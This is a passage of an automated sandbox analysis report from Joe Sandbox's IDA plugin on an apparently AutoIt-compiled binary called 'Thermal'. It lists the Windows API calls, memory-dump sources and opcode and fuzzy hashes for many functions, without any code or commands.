                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: bb8169880b776bb90235eabba2939e2547b6948f7c15588fc34aec83f7abfc61
                                                      • Instruction ID: a4915dabb01c4ea0d15ab3a97e2f3989ee1e0ca4e7f87ffdc95f444be1568eb5
                                                      • Opcode Fuzzy Hash: bb8169880b776bb90235eabba2939e2547b6948f7c15588fc34aec83f7abfc61
                                                      • Instruction Fuzzy Hash: E441D230508310AFD711DF24ECC8FBA7BF8EB69361F140669F9658B2A1C77098A5DB61
                                                      APIs
                                                      • ShowWindow.USER32(001E77B0,00000000,010E4AA0,?,?,001E77B0,?,001ABC1A,?,?), ref: 001ABD84
                                                      • EnableWindow.USER32(?,00000000), ref: 001ABDA8
                                                      • ShowWindow.USER32(001E77B0,00000000,010E4AA0,?,?,001E77B0,?,001ABC1A,?,?), ref: 001ABE08
                                                      • ShowWindow.USER32(?,00000004,?,001ABC1A,?,?), ref: 001ABE1A
                                                      • EnableWindow.USER32(?,00000001), ref: 001ABE3E
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 001ABE61
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 19622a5e4eb09bb331770cee97ece217ef8407e8df16f38a8a7a6bdd769b6f26
                                                      • Instruction ID: 811a58f0e498b776e1e98e9211985862aa3ecf4b65cfc76d772e430022fe4bd6
                                                      • Opcode Fuzzy Hash: 19622a5e4eb09bb331770cee97ece217ef8407e8df16f38a8a7a6bdd769b6f26
                                                      • Instruction Fuzzy Hash: 31414138608184AFDB26CF64C4C9BD57BE1FF0A314F1841A9EA598F6A3C732A855CB51
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,0019550C,?,?,00000000,00000001), ref: 00197796
                                                        • Part of subcall function 0019406C: GetWindowRect.USER32(?,?), ref: 0019407F
                                                      • GetDesktopWindow.USER32 ref: 001977C0
                                                      • GetWindowRect.USER32(00000000), ref: 001977C7
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 001977F9
                                                        • Part of subcall function 001857FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00185877
                                                      • GetCursorPos.USER32(?), ref: 00197825
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00197883
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: aa787bef2e1a710e758659678ab16dbfdf3f641560f8564845194e181ac5f9f9
                                                      • Instruction ID: 7029a65bcd32b5ac9e474d3c853ea038991d4bae4f50610c20d28fb7cfd99754
                                                      • Opcode Fuzzy Hash: aa787bef2e1a710e758659678ab16dbfdf3f641560f8564845194e181ac5f9f9
                                                      • Instruction Fuzzy Hash: 4C31D372508305AFDB21DF14D849F9BB7EAFF88314F000A19F58997191CB30EA49CBA2
                                                      APIs
                                                        • Part of subcall function 00178CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00178CDE
                                                        • Part of subcall function 00178CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00178CE8
                                                        • Part of subcall function 00178CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00178CF7
                                                        • Part of subcall function 00178CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00178CFE
                                                        • Part of subcall function 00178CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00178D14
                                                      • GetLengthSid.ADVAPI32(?,00000000,0017904D), ref: 00179482
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0017948E
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00179495
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 001794AE
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0017904D), ref: 001794C2
                                                      • HeapFree.KERNEL32(00000000), ref: 001794C9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: ffe0576bbf69c903459f3ff685c05d2272c8267852b91573dd62990e6b40de7f
                                                      • Instruction ID: b096cbd03ccf41553f50b39669b59241645c59297ebf555b28d836dc54f85bdc
                                                      • Opcode Fuzzy Hash: ffe0576bbf69c903459f3ff685c05d2272c8267852b91573dd62990e6b40de7f
                                                      • Instruction Fuzzy Hash: 1811AC72501604EFDB169FA8CD09BAF7BB9EB49356F108118E84A97210C7369949CB60
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00179200
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00179207
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00179216
                                                      • CloseHandle.KERNEL32(00000004), ref: 00179221
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00179250
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00179264
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: f7d8a71095b4e7f7ca6a6bb1156e02c1ca61ce77b6dfa6452aaea77283233e93
                                                      • Instruction ID: b3de5dba4eb7f898dfbb9d34a0a7a202b814d7a354959715342fa4162fa9df8c
                                                      • Opcode Fuzzy Hash: f7d8a71095b4e7f7ca6a6bb1156e02c1ca61ce77b6dfa6452aaea77283233e93
                                                      • Instruction Fuzzy Hash: 5A11597250124EABDF029F94ED49FDE7BB9EF08354F048154FE09A2160C7729DA4EB60
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0017C34E
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0017C35F
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0017C366
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0017C36E
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0017C385
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0017C397
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: aab1b65de5b082a7f3a9ef5d95462f0822330f489700bd8af52535c06d320a75
                                                      • Instruction ID: 6315c24acd6b034a13db7bfa7e5dc7875fdbf00776120c5ebd48aa64fa776e37
                                                      • Opcode Fuzzy Hash: aab1b65de5b082a7f3a9ef5d95462f0822330f489700bd8af52535c06d320a75
                                                      • Instruction Fuzzy Hash: C3014475E00318BBEF119BA59C49A5FBFB8EB48751F008165FE08A7280D7709D10CFA0
                                                      APIs
                                                        • Part of subcall function 001216CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00121729
                                                        • Part of subcall function 001216CF: SelectObject.GDI32(?,00000000), ref: 00121738
                                                        • Part of subcall function 001216CF: BeginPath.GDI32(?), ref: 0012174F
                                                        • Part of subcall function 001216CF: SelectObject.GDI32(?,00000000), ref: 00121778
                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 001AC57C
                                                      • LineTo.GDI32(00000000,00000003,?), ref: 001AC590
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001AC59E
                                                      • LineTo.GDI32(00000000,00000000,?), ref: 001AC5AE
                                                      • EndPath.GDI32(00000000), ref: 001AC5BE
                                                      • StrokePath.GDI32(00000000), ref: 001AC5CE
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: 1b6142aa5ce565a11562c044eb44dc58767a5ca59497ec252362c5157e78935f
                                                      • Instruction ID: 42f060856d9320bb9e248fb2cae37899d1ce8d7545f9654cf7c3cdea1f3625b8
                                                      • Opcode Fuzzy Hash: 1b6142aa5ce565a11562c044eb44dc58767a5ca59497ec252362c5157e78935f
                                                      • Instruction Fuzzy Hash: 36111E7640414CBFEF129F94DC88FAA7F6DEB08354F048111B9185A560D771AD95DBA0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001407EC
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 001407F4
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001407FF
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0014080A
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00140812
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0014081A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001859B4
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001859CA
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 001859D9
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001859E8
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001859F2
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001859F9
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 001877FE
                                                      • EnterCriticalSection.KERNEL32(?,?,0012C2B6,?,?), ref: 0018780F
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,0012C2B6,?,?), ref: 0018781C
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0012C2B6,?,?), ref: 00187829
                                                        • Part of subcall function 001871F0: CloseHandle.KERNEL32(00000000,?,00187836,?,0012C2B6,?,?), ref: 001871FA
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0018783C
                                                      • LeaveCriticalSection.KERNEL32(?,?,0012C2B6,?,?), ref: 00187843
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00179555
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00179561
                                                      • CloseHandle.KERNEL32(?), ref: 0017956A
                                                      • CloseHandle.KERNEL32(?), ref: 00179572
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0017957B
                                                      • HeapFree.KERNEL32(00000000), ref: 00179582
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00198CFD
                                                      • CharUpperBuffW.USER32(?,?), ref: 00198E0C
                                                      • VariantClear.OLEAUT32(?), ref: 00198F84
                                                        • Part of subcall function 00187B1D: VariantInit.OLEAUT32(00000000), ref: 00187B5D
                                                        • Part of subcall function 00187B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00187B66
                                                        • Part of subcall function 00187B1D: VariantClear.OLEAUT32(00000000), ref: 00187B72
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      APIs
                                                        • Part of subcall function 0013436A: _wcscpy.LIBCMT ref: 0013438D
                                                      • _memset.LIBCMT ref: 0018332E
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0018335D
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00183410
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0018343E
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      APIs
                                                      • _memset.LIBCMT ref: 00182F67
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00182F83
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00182FC9
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001E7890,00000000), ref: 00183012
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00179ACC
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00179ADF
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00179B0F
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      APIs
                                                        • Part of subcall function 00122111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0012214F
                                                        • Part of subcall function 00122111: GetStockObject.GDI32(00000011), ref: 00122163
                                                        • Part of subcall function 00122111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012216D
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001A6A86
                                                      • LoadLibraryW.KERNEL32(?), ref: 001A6A8D
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001A6AA2
                                                      • DestroyWindow.USER32(?), ref: 001A6AAA
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00187377
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001873AA
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 001873BC
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001873F6
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00187444
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00187476
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00187487
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001874C1
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0018B297
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0018B2EB
                                                      • __swprintf.LIBCMT ref: 0018B304
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,001B0980), ref: 0018B342
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: e6103f90f455730b69c347eba7f09b426e4022185f39217cf7ef99a6cf0d8e3f
                                                      • Instruction ID: 233244721ae741bdd83ec03ad2e8e644a40d9f50176b178caac2ebd8cbfc82c1
                                                      • Opcode Fuzzy Hash: e6103f90f455730b69c347eba7f09b426e4022185f39217cf7ef99a6cf0d8e3f
                                                      • Instruction Fuzzy Hash: 42214434600209AFCB10EFA5D985DAEB7B8EF89704B104069F905D7351DB31EA45CB61
                                                      APIs
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                        • Part of subcall function 0017AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0017AA6F
                                                        • Part of subcall function 0017AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0017AA82
                                                        • Part of subcall function 0017AA52: GetCurrentThreadId.KERNEL32 ref: 0017AA89
                                                        • Part of subcall function 0017AA52: AttachThreadInput.USER32(00000000), ref: 0017AA90
                                                      • GetFocus.USER32 ref: 0017AC2A
                                                        • Part of subcall function 0017AA9B: GetParent.USER32(?), ref: 0017AAA9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0017AC73
                                                      • EnumChildWindows.USER32(?,0017ACEB), ref: 0017AC9B
                                                      • __swprintf.LIBCMT ref: 0017ACB5
                                                      Strings
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                      • String ID: %s%d
                                                      • API String ID: 1941087503-1110647743
                                                      • Opcode ID: 1914a15a85307bc8001b70ab1709c215bd9dee7992b3a655eebd9ff42491bc8c
                                                      • Instruction ID: 17d8fa4186795974f926e90ee0d680231921346cd1124c27d60294a26e197a55
                                                      • Opcode Fuzzy Hash: 1914a15a85307bc8001b70ab1709c215bd9dee7992b3a655eebd9ff42491bc8c
                                                      • Instruction Fuzzy Hash: A4119D75600205BBDF12AFA08D85FEE777CAF98710F1080A5FE0CAA142DB7099459B75
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00182318
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: 0add337a5491428d35e245cb36e283b304fd571d4b86918e08bfe05983afe106
                                                      • Instruction ID: 3f2cc0ad994214371ea82aa98901b0d0e4a0e72bf6c948a1dc1367a143db1227
                                                      • Opcode Fuzzy Hash: 0add337a5491428d35e245cb36e283b304fd571d4b86918e08bfe05983afe106
                                                      • Instruction Fuzzy Hash: 2B113C34900119DBCF01EF94D9A18EEB7B4FF29344B108469D81667261EB365E0ADF50
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0019F2F0
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0019F320
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0019F453
                                                      • CloseHandle.KERNEL32(?), ref: 0019F4D4
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: ba68c645b613dcae69456a4bab77a20b3ae19d64a82bbbb71352559ae11013cb
                                                      • Instruction ID: 172ef8df7557b65104e3d2cc105c5fb38c4443d27424a00e00ba69d8e583f48b
                                                      • Opcode Fuzzy Hash: ba68c645b613dcae69456a4bab77a20b3ae19d64a82bbbb71352559ae11013cb
                                                      • Instruction Fuzzy Hash: A6819171600310AFD720EF68E886F2AB7E5AF58710F14891DF999DB292D770EC518F51
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 001A147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A075D
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001A079C
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001A07E3
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 001A080F
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 001A081C
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: 8a1c14d908c027e239a96fe842f35e338c692fdc30693a9f1c4cdaf24e818bfd
                                                      • Instruction ID: 076f3df146d03b5f88c2580938e976b2b71181333ddd4c37bfc5d7e6d8e95679
                                                      • Opcode Fuzzy Hash: 8a1c14d908c027e239a96fe842f35e338c692fdc30693a9f1c4cdaf24e818bfd
                                                      • Instruction Fuzzy Hash: 0D515875208204AFD705EFA4C891E6BB7E9BF99304F04891DF595872A1DB30E944CB52
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0018EC62
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0018EC8B
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0018ECCA
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0018ECEF
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0018ECF7
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: f0107e98fb3a2ff5a90fd3ba454f650bf8cc837fed4be755a72a56d1c15e30be
                                                      • Instruction ID: 193baeaa1deede02974d73a3116453b727278646e2d40982ec9a6eb814b6ea47
                                                      • Opcode Fuzzy Hash: f0107e98fb3a2ff5a90fd3ba454f650bf8cc837fed4be755a72a56d1c15e30be
                                                      • Instruction Fuzzy Hash: F1512A35A00519EFCB01EFA4D985AAEBBF5EF18314B148099F809AB3A1CB31ED55DF50
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d24e5f80c0eed0fd529baa533efa6dd9658c529f9aace3574090ad0632c7463
                                                      • Instruction ID: a85fc6ab76a45aff0904159501f9d971a3580e107f5c730583356018fcf6237b
                                                      • Opcode Fuzzy Hash: 6d24e5f80c0eed0fd529baa533efa6dd9658c529f9aace3574090ad0632c7463
                                                      • Instruction Fuzzy Hash: 0C41067D900204AFD714CBA4CC88FBBBBB4EF0A320F950255F916A72D1C7719D41DA51
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00122727
                                                      • ScreenToClient.USER32(001E77B0,?), ref: 00122744
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00122769
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00122777
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 3608984ad88c3f681636ca485f8792b806eb8c60b2e5bdd09f7057327047bc5c
                                                      • Instruction ID: 8ec808764fe0dd3ffa41084b73d7b002b4e9fa994c4b8a750000523d7f6b74b2
                                                      • Opcode Fuzzy Hash: 3608984ad88c3f681636ca485f8792b806eb8c60b2e5bdd09f7057327047bc5c
                                                      • Instruction Fuzzy Hash: 67415E35508219FFDF199FA8C844EEDBB74FB15325F10831AF82896290C730ADA4DB91
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 001795E8
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00179692
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0017969A
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 001796A8
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001796B0
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 06180584bdae67dcdcf5f591874cf1972bf2a749dcf3420acb4303fb59246ba2
                                                      • Instruction ID: 239a64b516ae9c0e79acfa29303592de8ecfb067ed148eec450b9b0567c9e12c
